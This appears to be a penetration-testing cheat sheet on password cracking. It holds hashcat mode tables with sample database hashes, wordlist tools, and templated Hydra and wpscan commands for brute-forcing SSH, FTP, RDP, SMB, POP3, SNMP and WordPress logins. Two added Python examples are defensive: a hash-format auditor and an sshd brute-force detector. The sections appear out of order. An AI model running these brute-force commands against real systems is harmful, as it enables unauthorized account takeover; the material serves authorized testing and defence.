Password cracking
Identify hash
# https://github.com/noraj/haiti
haiti [hash]

Dictionary creation
# Pydictor
# https://www.github.com/landgrey/pydictor.git
pydictor.py -extend TERM --leet 0 1 2 11 21 --len 4 20

# Username generator
# https://github.com/benbusby/namebuster
namebuster https://example.com
namebuster "term1, term2"

# Web-based wordlist generator
https://app.wgen.io/
Useful hashes
Linux Hashes - /etc/shadow
Mode   Hash type
500    md5crypt $1$, MD5(Unix)
200    bcrypt $2*$, Blowfish(Unix)
400    sha256crypt $5$, SHA256(Unix)
1800   sha512crypt $6$, SHA512(Unix)

Windows Hashes
Mode   Hash type
3000   LM
1000   NTLM

Common Hashes
Mode   Hash type   Category
900    MD4         Raw Hash
0      MD5         Raw Hash
5100   Half MD5    Raw Hash
100    SHA1        Raw Hash
10800  SHA-384     Raw Hash
1400   SHA-256     Raw Hash
1700   SHA-512     Raw Hash
Common Files with password
Mode   Hash type
11600  7-Zip
12500  RAR3-hp
13000  RAR5
13200  AxCrypt
13300  AxCrypt in-memory SHA1
13600  WinZip
9700   MS Office <= 2003 $0/$1, MD5 + RC4
9710   MS Office <= 2003 $0/$1, MD5 + RC4, collider #1
9720   MS Office <= 2003 $0/$1, MD5 + RC4, collider #2
9800   MS Office <= 2003 $3/$4, SHA1 + RC4
9810   MS Office <= 2003 $3, SHA1 + RC4, collider #1
9820   MS Office <= 2003 $3, SHA1 + RC4, collider #2
9400   MS Office 2007
9500   MS Office 2010
9600   MS Office 2013
10400  PDF 1.1 - 1.3 (Acrobat 2 - 4)
10410  PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1
10420  PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2
10500  PDF 1.4 - 1.6 (Acrobat 5 - 8)
10600  PDF 1.7 Level 3 (Acrobat 9)
10700  PDF 1.7 Level 8 (Acrobat 10 - 11)
16200  Apple Secure Notes
Database Hashes (category: Database Server)
Mode   Hash type                    Example hash
12     PostgreSQL                   a6343a68d964ca596d9752250d54bb8a:postgres
131    MSSQL (2000)                 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
132    MSSQL (2005)                 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
1731   MSSQL (2012, 2014)           0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375
200    MySQL323                     7196759210defdc0
300    MySQL4.1/MySQL5              fcf7c1b8749cf99d88e5f34271d636178fb5d130
3100   Oracle H: Type (Oracle 7+)   7A963A529D2E3229:3682427524
112    Oracle S: Type (Oracle 11+)  ac5f1e62d21fd0529428b84d42e8955b04966703:38445748184477378130
12300  Oracle T: Type (Oracle 12+)  78281A9C0CF626BD05EFC4F41B515B61D6C4D95A250CD4A605CA0EF97168D670EBCB5673B6F5A2FB9CC4E0C0101E659C0C4E3B9B3BEDA846CD15508E88685A2334141655046766111066420254008225
8000   Sybase ASE                   0xc00778168388631428230545ed2c976790af96768afa0806fe6c0da3b28f3e132137eac56f9bad027ea2
Kerberos Hashes
Mode   Hash type      Prefix
13100  Type 23        $krb5tgs$23$
19600  Type 17        $krb5tgs$17$
19700  Type 18        $krb5tgs$18$
18200  ASREP Type 23  $krb5asrep$23$
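The "Identify hash" step and the tables above come together in the following script, an added example that is not part of the original page or of haiti: it tags each line of a credential dump with its hash family using the prefixes listed above ($1$, $5$, $6$, $2*$, $krb5tgs$NN$, $krb5asrep$23$, LM/NT pairs, raw hex digests) so a defender can see which accounts still sit on legacy formats. The sample dump, the "legacy" triage rule and the helper names are this example's own assumptions.

```python
import re
# (prefix, algorithm, legacy) using the identifiers from the tables above. The legacy
# flag is this example's own triage rule: md5crypt, RC4 Kerberos material and raw digests.
PREFIXES = [
    ("$1$", "md5crypt", True), ("$5$", "sha256crypt", False), ("$6$", "sha512crypt", False),
    ("$2a$", "bcrypt", False), ("$2b$", "bcrypt", False), ("$2y$", "bcrypt", False),
    ("$krb5tgs$23$", "krb5tgs etype 23 (RC4)", True), ("$krb5asrep$23$", "krb5asrep etype 23 (RC4)", True),
    ("$krb5tgs$17$", "krb5tgs etype 17 (AES128)", False), ("$krb5tgs$18$", "krb5tgs etype 18 (AES256)", False),
]
RAW_BY_LEN = {32: "32-hex raw (MD5/NTLM)", 40: "40-hex raw (SHA1)", 64: "64-hex raw (SHA-256)",
              96: "96-hex raw (SHA-384)", 128: "128-hex raw (SHA-512)"}
PWDUMP = re.compile(r"^([^:]+):\d+:([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")  # user:rid:LM:NT:::
HEX = re.compile(r"^[0-9a-fA-F]+$")
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM storage is disabled

def classify(h):
    """Return (algorithm name, legacy flag) for a single hash string."""
    for prefix, name, legacy in PREFIXES:
        if h.startswith(prefix):
            return name, legacy
    if h in ("", "*") or h.startswith("!"):
        return "locked/no password", False
    if HEX.match(h):  # unsalted raw digests crack fast whatever their size
        return RAW_BY_LEN.get(len(h), "raw hex (unknown length)"), True
    return "unknown", False

def audit(lines):
    """Return [(user, algorithm, legacy)] for /etc/shadow, pwdump or bare-hash lines."""
    findings = []
    for line in (l.strip() for l in lines if l.strip()):
        m = PWDUMP.match(line)
        if m:
            user, lm, _nt = m.groups()
            if lm.lower() != LM_EMPTY:
                findings.append((user, "LM", True))
            findings.append((user, "NTLM", True))
            continue
        fields = line.split(":")  # shadow: user:hash:...; bare line: hash only
        user, h = (fields[0], fields[1]) if len(fields) > 1 else ("-", fields[0])
        findings.append((user, *classify(h)))
    return findings

SAMPLE = [  # constructed sample dump; salts and hash bodies are filler, not real hashes
    "root:$6$saltsalt$ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ:19000:0:99999:7:::",
    "legacy:$1$saltsalt$ZZZZZZZZZZZZZZZZZZZZZZ:19000:0:99999:7:::",
    "svc:!:19000:0:99999:7:::",
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000000:::",
    "oldpc:1001:11111111111111111111111111111111:22222222222222222222222222222222:::",
    "$krb5tgs$23$*svc$REALM$svc/host*$00000000$00000000",
]
```

Run audit(SAMPLE) to get one (user, algorithm, legacy) tuple per hash; a host still storing LM or md5crypt material shows up with the legacy flag set.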
Files
Single characters:
  a-z
  A-Z
  Special characters
Password Cracking
Hack Responsibly.
Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
Headings:
This page was getting to be long, so here are shortcuts to the major sections. I broke these out into separate pages for better organization and searchability.
Not all methods of discovering passwords involve directly "cracking" hashes. Brute forcing logins and direct recovery programs are also viable solutions.
Default Credentials
Search using your favorite web search engine for default credentials of the technology that is being used, or try the following compilation lists:
Wordlists
Password Recovery
Password recovery programs: https://www.passcape.com/products (TODO:Test these!)
ZIP Password Retrieval (with Known Plaintext)
Download pkcrack: https://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack/download1.html
Note: before using, it must be built from source.
Syntax
Brute forcing logins
An amazing index of brute-force commands: https://book.hacktricks.xyz/brute-force
Hydra
Below are a few scriptable examples to brute force logins of common protocols.

SNMP: brute force
hydra -P $pass_list -v $ip snmp -vV

FTP: with known user, using password list
hydra -t 1 -l $user -P $pass_list -vV $ip ftp

SSH: using users list and passwords list
hydra -vV -u -L $users_list -P $pass_list -t 1 -u $ip ssh

SSH: with a known password and a username list
hydra -vV -u -L $users_list -p $pass -t 1 -u $ip ssh

SSH: with known username on non-standard port
hydra -vV $ip -s $port ssh -l $user -P $pass_list

POP3: brute force
hydra -vV -l $user -P $pass_list -f $ip pop3

HTTP GET: with user list and pass list
hydra -vV -L $users_list -P $pass_list $ip http-get $login_page

Windows Remote Desktop: with known username and pass list
hydra -vV -t 1 -f -l $user -P $pass_list rdp://$ip

SMB: brute force with known user and pass list
hydra -vV -t 1 -f -l $user -P $pass_list $ip smb

WordPress: brute force an admin login
hydra -vV -l $user -P $pass_list $ip http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

WordPress: enumerate users
hydra -vV -L $users_list -p $pass $ip http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

Use wpscan to brute force the password with a known user
wpscan --url $url -U $user -P $pass_list
Other useful Hydra options
-x min:max:charset - Generate passwords from min to max length. Charset can contain 1 for numbers, a for lowercase and A for uppercase characters. Any other character that is added is put in the list.
Example: 1:2:a1%. The generated passwords will be of length 1 to 2 and contain lowercase letters, numbers and/or percent signs and periods/dots.
-e nsr - Do additional checks: n tries a null password, s tries the login as the password, r tries the reversed login as the password.
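The login brute-force runs above leave a distinctive trace in the target's auth log. As an added example, not part of the original page or of Hydra, here is detection logic over constructed sshd log lines: it flags a source that exceeds a failure threshold inside a time window, labels it a spray when the failures cycle through many users (the -L users-list pattern), and raises a second alert if that source later logs in successfully. The threshold, window and RFC 5737 addresses are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime
# OpenSSH "Failed/Accepted password" syslog lines.
LINE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
                  r"password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+")

def parse(lines, year=2024):
    """Turn raw syslog lines into (timestamp, source, user, success) events."""
    events = []
    for line in lines:
        m = LINE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["src"], m["user"], m["result"] == "Accepted"))
    return events

def detect(events, window_s=60, threshold=5):
    """Alert on a source with >= threshold failures inside window_s seconds, and on
    any later success from that source (the outcome a brute force is after)."""
    alerts, flagged = [], set()
    recent = defaultdict(list)  # src -> [(ts, user)] failures still inside the window
    for ts, src, user, ok in sorted(events):
        if ok:
            if src in flagged:
                alerts.append(("success-after-bruteforce", src, user))
            continue
        recent[src] = [(t, u) for t, u in recent[src] if (ts - t).total_seconds() <= window_s]
        recent[src].append((ts, user))
        if len(recent[src]) >= threshold and src not in flagged:
            flagged.add(src)
            users = {u for _, u in recent[src]}
            # Many users from one source is a spray; a single user is a classic brute force.
            kind = "password-spray" if len(users) > 1 else "bruteforce"
            alerts.append((kind, src, f"{len(recent[src])} failures, {len(users)} users"))
    return alerts

# Constructed sample log (RFC 5737 test addresses), shaped like a hydra -L/-P run.
SAMPLE_LOG = """\
Mar 10 09:15:01 bastion sshd[4120]: Failed password for invalid user admin from 198.51.100.7 port 51022 ssh2
Mar 10 09:15:02 bastion sshd[4121]: Failed password for root from 198.51.100.7 port 51023 ssh2
Mar 10 09:15:03 bastion sshd[4122]: Failed password for invalid user oracle from 198.51.100.7 port 51024 ssh2
Mar 10 09:15:04 bastion sshd[4123]: Failed password for invalid user postgres from 198.51.100.7 port 51025 ssh2
Mar 10 09:15:05 bastion sshd[4124]: Failed password for invalid user test from 198.51.100.7 port 51026 ssh2
Mar 10 09:15:09 bastion sshd[4126]: Accepted password for backup from 198.51.100.7 port 51028 ssh2
Mar 10 09:20:30 bastion sshd[4301]: Failed password for alice from 203.0.113.5 port 40112 ssh2
Mar 10 09:20:41 bastion sshd[4302]: Accepted password for alice from 203.0.113.5 port 40113 ssh2
""".splitlines()
```

detect(parse(SAMPLE_LOG)) returns two alerts for 198.51.100.7 and nothing for the single mistyped password from 203.0.113.5.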
crackmapexec
https://mpgn.gitbook.io/crackmapexec/
Resources